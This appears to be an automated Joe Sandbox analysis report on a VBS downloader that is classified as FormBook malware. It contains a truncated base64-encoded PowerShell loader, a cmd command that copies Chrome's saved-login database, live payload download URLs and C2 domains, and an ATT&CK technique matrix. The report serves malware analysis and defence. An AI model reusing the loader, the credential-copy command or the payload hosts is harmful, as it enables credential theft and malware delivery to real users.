      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: explorer.exe, 00000015.00000000.1015394640.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.1088990899.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.999045457.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1040185049.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000015.00000000.1043806795.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts521
      Scripting
      1
      Registry Run Keys / Startup Folder
      512
      Process Injection
      11
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules
      Boot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      521
      Scripting
      1
      Credential API Hooking
      114
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth11
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts11
      Command and Scripting Interpreter
      Logon Script (Windows)Logon Script (Windows)3
      Obfuscated Files or Information
      Security Account Manager1
      Query Registry
      SMB/Windows Admin Shares1
      Email Collection
      Automated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      PowerShell
      Logon Script (Mac)Logon Script (Mac)1
      Rootkit
      NTDS421
      Security Software Discovery
      Distributed Component Object Model1
      Credential API Hooking
      Scheduled Transfer113
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common231
      Virtualization/Sandbox Evasion
      Cached Domain Credentials231
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items512
      Process Injection
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      Remote System Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 557838 Sample: New _Inquiry P.O4622.vbs Startdate: 21/01/2022 Architecture: WINDOWS Score: 100 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for URL or domain 2->63 65 12 other signatures 2->65 11 wscript.exe 2 2->11         started        process3 signatures4 77 VBScript performs obfuscated calls to suspicious functions 11->77 79 Wscript starts Powershell (via cmd or directly) 11->79 81 Very long command line found 11->81 83 Encrypted powershell cmdline option found 11->83 14 powershell.exe 25 11->14         started        process5 signatures6 87 Tries to detect Any.run 14->87 89 Hides threads from debuggers 14->89 17 ieinstal.exe 6 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        process7 dnsIp8 47 owanlab.com 157.7.107.166, 443, 49823 INTERQGMOInternetIncJP Japan 17->47 67 Modifies the context of a thread in another process (thread injection) 17->67 69 Tries to detect Any.run 17->69 71 Maps a DLL or memory area into another process 17->71 73 3 other signatures 17->73 26 explorer.exe 17->26 injected 45 C:\Users\user\AppData\Local\...\vsdke30k.dll, PE32 21->45 dropped 30 cvtres.exe 1 21->30         started        file9 signatures10 process11 dnsIp12 49 www.ordemt.com 26->49 85 System process connects to network (likely due to code injection or exploit) 26->85 32 svchost.exe 1 18 26->32         started        signatures13 process14 file15 41 C:\Users\user\AppData\...\LQMlogrv.ini, data 32->41 dropped 43 C:\Users\user\AppData\...\LQMlogri.ini, data 32->43 dropped 51 Detected FormBook malware 32->51 53 Creates an undocumented autostart registry key 32->53 55 Tries to steal Mail credentials (via file / registry access) 32->55 57 4 other signatures 32->57 36 cmd.exe 2 32->36         started        signatures16 process17 signatures18 75 Tries to harvest and steal browser information (history, passwords, etc) 36->75 39 conhost.exe 36->39         started        process19

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      New _Inquiry P.O4622.vbs9%VirustotalBrowse
      New _Inquiry P.O4622.vbs14%ReversingLabsScript-WScript.Downloader.SLoad
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      owanlab.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png0~0%Avira URL Cloudsafe
      https://gsmservice.tech/bin_DziiNe252.bin0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin0%Avira URL Cloudsafe
      https://contoso.com/0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      www.usyeslogistics.com/k6sm/0%Avira URL Cloudsafe
      https://owanlab.com/bin_DziiNe252.bin100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      owanlab.com
      157.7.107.166
      truetrueunknown
      www.ordemt.com
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        www.usyeslogistics.com/k6sm/true
        • Avira URL Cloud: safe
        low
        https://owanlab.com/bin_DziiNe252.bintrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.png0~powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://gsmservice.tech/bin_DziiNe252.binieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/Pester/Pester0~powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
              high
              https://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.binieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.html0~powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.1018870776.0000000004D21000.00000004.00000001.sdmpfalse
                    high
                    https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      157.7.107.166
                      owanlab.comJapan7506INTERQGMOInternetIncJPtrue
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:557838
                      Start date:21.01.2022
                      Start time:17:22:23
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 30s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:New _Inquiry P.O4622.vbs
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winVBS@14/16@4/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 61.5% (good quality ratio 53.5%)
                      • Quality average: 71.8%
                      • Quality standard deviation: 33.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .vbs
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      17:24:53API Interceptor34x Sleep call for process: powershell.exe modified
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8003
                      Entropy (8bit):4.842774286652891
                      Encrypted:false
                      SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                      MD5:62F0B7274EE33977F05FE8727590EBA4
                      SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                      SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                      SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                      Malicious:false
                      Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.792852251086831
                      Encrypted:false
